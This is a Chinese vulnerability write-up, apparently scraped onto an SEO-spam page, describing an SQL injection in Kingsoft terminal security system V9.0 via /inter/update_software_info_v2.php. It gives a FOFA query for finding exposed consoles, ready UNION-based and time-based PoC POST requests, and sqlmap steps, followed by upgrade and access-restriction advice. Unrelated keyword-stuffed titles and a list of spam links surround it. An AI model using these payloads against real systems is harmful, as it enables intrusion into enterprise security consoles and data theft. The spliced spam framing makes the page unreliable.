当前位置: 首页 > news >正文

中国最厉害的网站建设公司今日新闻头条大事

中国最厉害的网站建设公司,今日新闻头条大事,企业网站的综合要求,深圳松岗最新消息今天0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该…

0x01 产品简介

     金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。

0x02 漏洞概述

    金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

0x03 影响范围

 金山终端安全系统<V9.SP1.E1008

0x04 复现环境

FOFA:title=="用户登录-金山终端安全系统V9.0Web控制台"

0x05 漏洞复现

PoC

POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedtype=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=

查询当前用户

延时注入

Sqlmap验证 

数据包放txt里面

POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedtype=-100*&key=&pageCount=0&curPage=

0x06 修复建议 

升级修复方案

官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站,更新版本至新版本。https://www.ejinshan.net/lywz/index

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议,不要将集权设备的Web管理控制台开放在互联网上,并且仅允许可信IP进行访问。

http://www.dinnco.com/news/16470.html

相关文章:

  • 网站和新媒体建设审批制度网站展示型推广
  • 郑州网站排名优化公司网站建设的六个步骤
  • 建设网站广州市附近成人电脑培训班
  • 中国肺炎疫情最新消息广州百度快速优化排名
  • 佛山服务类网站建设公司seo营销
  • 西直门网站建设公司旅游网络营销的渠道有哪些
  • 中山cp网站建设官网seo优化
  • 怎么看待网站开发学电商哪个培训学校好
  • 网站怎么做支付seo怎么做优化工作
  • postgresql wordpress外贸seo站
  • wordpress数据库修改url辽宁seo推广
  • 网站建设施工方案网站域名购买
  • 权威网站优化价格如何自己建一个网站
  • 理财网站开发文档谷歌搜索引擎免费
  • 外国网站后台设计互联网营销师培训教材
  • 扒wordpressseo关键词排名优
  • 专门做日本旅行网站网络营销专业主要学什么
  • 广州旅游网站建设网络广告营销方案
  • 做网站行业如何跟客户交流温州seo外包公司
  • 公司建网站的步骤是什么山东seo推广
  • 网站建设seo策略有哪些成品网站建站空间
  • 现在做一个什么的网站比较好百度快照客服人工电话
  • https的网站怎么做线上教育培训机构十大排名
  • 哪里做网站比较快站长之家站长工具
  • 徐州网站开发价位上海优化网站seo公司
  • 万业网网站建设审核北京网络推广公司wyhseo
  • 手工制作飞机模型周口seo
  • 公司网站建设工作通知南宁seo服务公司
  • 找做网站的公司需要注意什么外贸网站免费推广
  • 石家庄谁会搭建网站中国网络推广网站排名